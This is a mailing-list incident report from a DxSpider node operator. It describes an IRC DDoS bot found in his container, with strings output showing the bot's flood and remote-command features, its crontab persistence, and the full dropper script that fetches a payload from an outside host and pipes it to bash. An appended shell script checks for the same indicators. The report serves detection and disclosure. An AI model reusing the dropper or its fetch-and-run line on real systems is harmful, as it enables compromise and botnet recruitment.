[Dxspider-support] URGENT Suspicious traffic in my container - Scanbot

Patrick Skerrett patrick at skerrett.net
Sat Sep 6 18:01:42 BST 2025


Hi Dirk,


FYI, sorry I did not send this to the spider list initially...

On Sat, Sep 6, 2025 at 10:42 AM Patrick Skerrett <patrick at skerrett.net>
wrote:

> I run DxSpider as a docker container on my swarm cluster. I had a ping
> this morning from my IDS router that there was some command & control
> traffic to IRC coming from the node that runs DxSpider.
>
> In looking, I found what looks like a DDOS bot deployed on my node, as the
> user 'sysop' (the user that DXSpider runs under).
>
> *************
> Considering the DXSpider server runs in an isolated container and the
> suspicious files were written as the 'sysop' owner, I think I have to
> conclude there is a vulnerability in the DxSpider software that allowed
> this payload to be deployed!!
> *********
>
> Here is the relevant info:
>
> Payload was written to "/var/tmp/.. / ". That is dot dot space.
>
> Obfuscated directory name to make it hard to navigate to.
>
> The process itself is a compiled application called '-bash'
>
> Trying to view it in a hex editor, I discovered these strings:
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
> "(http|tcp|connect|socket|bot|scan)" | head -10
> NOTICE %s :Unable to create socket.
> http://
> NOTICE %s :Unable to connect to http.
> NOTICE %s :GET <http address> <save as>                     = Downloads a
> file off the web and saves it onto the hd
> [32m botnet
> [36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp
> pass
> [37m bot nick is required e.g
> [37m bot ident is required e.g
> [37m bot realname is required e.g
> Not a socket
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
> "(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10
> MODE %s +xi
> JOIN %s :%s
> PONG %s
> JOIN %s
> MODE %s +o %s
> PRIVMSG
> PING
> JOIN
> DT_JOINABLE
> _PRIVMSG
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i
> "NOTICE"
> NOTICE %s :Unable to comply.
> NOTICE %s :GET <host> <save as>
> NOTICE %s :Unable to create socket.
> NOTICE %s :Unable to resolve address.
> NOTICE %s :Unable to connect to http.
> NOTICE %s :Receiving file.
> NOTICE %s :Saved as %s
> NOTICE %s :Spoofs: %d.%d.%d.%d
> NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
> NOTICE %s :Bot by anonymous
> NOTICE %s :NICK <nick>
> NOTICE %s :Nick cannot be larger than 9 characters.
> NOTICE %s :DISABLE <pass>
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like: 169.40
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs>                          = Special
> packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs>                       = An advanced
> syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
> NOTICE %s :UNKNOWN <target> <secs>                          = Another
> non-spoof udp flooder
> NOTICE %s :NICK <nick>                                      = Changes the
> nick of the client
> NOTICE %s :SERVER <server>                                  = Changes
> servers
> NOTICE %s :GETSPOOFS                                        = Gets the
> current spoofing
> NOTICE %s :SPOOFS <subnet>                                  = Changes
> spoofing to a subnet
> NOTICE %s :DISABLE                                          = Disables all
> packeting from this client
> NOTICE %s :ENABLE                                           = Enables all
> packeting from this client
> NOTICE %s :KILL                                             = Kills the
> client
> NOTICE %s :GET <http address> <save as>                     = Downloads a
> file off the web and saves it onto the hd
> NOTICE %s :VERSION                                          = Requests
> version of client
> NOTICE %s :KILLALL                                          = Kills all
> current packeting
> NOTICE %s :HELP                                             = Displays this
> NOTICE %s :IRC <command>                                    = Sends this
> command to the server
> NOTICE %s :SH <command>                                     = Executes a
> command
> NOTICE %s :Killing pid %d.
> NOTICE %s :%s
>
> This is obviously bad stuff.
>
>
> **** HOW TO DETECT IF THIS IS ON YOUR NODE****
>
> As sudo:
>  ps -ef |grep ScanBot
> sysop       1990       1  0 09:40 ?        00:00:00 ScanBot
>
> # ls -l "/var/tmp/.. /"
> total 5340
> -rw-r----- 1 sysop sysop   72770 Sep  6 09:39 block.lst
> drwxr-xr-x 2 sysop sysop    4096 Apr  3 02:55 bot
> -rwxr-xr-x 1 sysop sysop     855 Feb 12  2023 clear
> -rwxr-xr-x 1 sysop sysop 3272064 Oct 12  2023 curl
> drwxr-xr-x 2 sysop sysop    4096 Sep  6 09:31 pass_files
> -rwxr-xr-x 1 sysop sysop 2094872 Jul 13  2024 rm
> -rwxr-xr-x 1 sysop sysop     499 Sep  6 09:29 scanbot
> -rw-r--r-- 1 sysop sysop       0 Sep  6 10:35 scanbot.lst
> drwxr-xr-x 2 sysop sysop    4096 Dec  7  2023 screen
>
> It created a crontab entry for the sysop user:
>  /var/spool/cron/crontabs/sysop
> root at node3:/var/tmp# cat /var/spool/cron/crontabs/sysop
> # DO NOT EDIT THIS FILE - edit the master and reinstall.
> # (- installed on Sat Sep  6 09:29:49 2025)
> # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
> * * * * * "/var/tmp/.. "/scanbot
>
> It runs every minute and tries to re-download itself:
>
> #!/bin/bash
>
> cd "/var/tmp/.. "
> shopt -s expand_aliases
> alias curl="./curl"
> type="randomscan"
> host="cc.systemctl.cc"
> api="scanbot.sh"
> brute_type="spirit"
> pubnick="sysop at 98.46.184.64"
> privnick="sysop at 98.46.143.4"
> scanbot()
> {
>     url="$1"
>     if [ ! -z "$url" ]; then
>         url="url = \"$url\""
>         curl -K - << EOF
>         ipv4
>         fail
>         silent
>         connect-timeout = 60
>         max-time = 120
>         retry = 2
>         $url
> EOF
>         sync
>     fi
> }
> scanbot
> $host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick
> | bash
>
> ************
> Please check to see if anyone is running this process; if so, we may have
> a vulnerability that would allow the DXSpider cluster to become a DDOS C&C
> vector!!!
> ********
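A defender-side check for the three indicators described in the post above, as an added example that is not part of the original message or of DXSpider: it looks for the "dot dot space" directory under /var/tmp, a sysop crontab entry that calls into it, and a ScanBot or '-bash' process running as sysop. The ROOT argument and the make_sample_tree helper are assumptions of this example, for pointing the file checks at a mounted container filesystem and for building a harmless constructed test tree.

```shell
#!/bin/sh
# Added example (not from the original post): checks for the ScanBot
# indicators Patrick reported. ROOT (assumed parameter) lets the file checks
# run against an alternate root such as a mounted container filesystem;
# an empty ROOT means the live host.
# check_dir ROOT: succeeds if "$ROOT/var/tmp/.. /" (dot dot space) exists
check_dir() {
    [ -d "$1/var/tmp/.. " ]
}
# check_cron ROOT: succeeds if the sysop crontab references the hidden dir
check_cron() {
    f="$1/var/spool/cron/crontabs/sysop"
    [ -f "$f" ] && grep -q '/var/tmp/\.\. ' "$f"
}
# check_proc: succeeds if a ScanBot or '-bash' process is running as sysop
check_proc() {
    ps -eo user=,comm= 2>/dev/null |
        awk '$1 == "sysop" && ($2 == "ScanBot" || $2 == "-bash") { hit = 1 }
             END { exit !hit }'
}
# count_indicators ROOT: prints findings on stderr and the hit count on stdout
count_indicators() {
    root="${1:-}"
    hits=0
    if check_dir "$root"; then
        echo "HIT: hidden directory '$root/var/tmp/.. /' exists" >&2
        ls -la "$root/var/tmp/.. /" >&2
        hits=$((hits + 1))
    fi
    if check_cron "$root"; then
        echo "HIT: sysop crontab calls into /var/tmp/.. :" >&2
        grep -n '/var/tmp/\.\. ' "$root/var/spool/cron/crontabs/sysop" >&2
        hits=$((hits + 1))
    fi
    # the process check only makes sense on the live host, not a mounted image
    if [ -z "$root" ] && check_proc; then
        echo "HIT: ScanBot/-bash process running as sysop" >&2
        hits=$((hits + 1))
    fi
    echo "$hits"
}
# make_sample_tree DIR: constructed sample reproducing the post's crontab line
# and hidden directory, so the checks can be exercised offline (not a real
# infection; the crontab text is copied from the report above)
make_sample_tree() {
    mkdir -p "$1/var/tmp/.. /bot" "$1/var/spool/cron/crontabs"
    printf '* * * * * "/var/tmp/.. "/scanbot\n' > "$1/var/spool/cron/crontabs/sysop"
}
```

On a live node, run `count_indicators` with no argument as root; a non-zero count means at least one of the reported artifacts is present and the node should be taken offline for investigation.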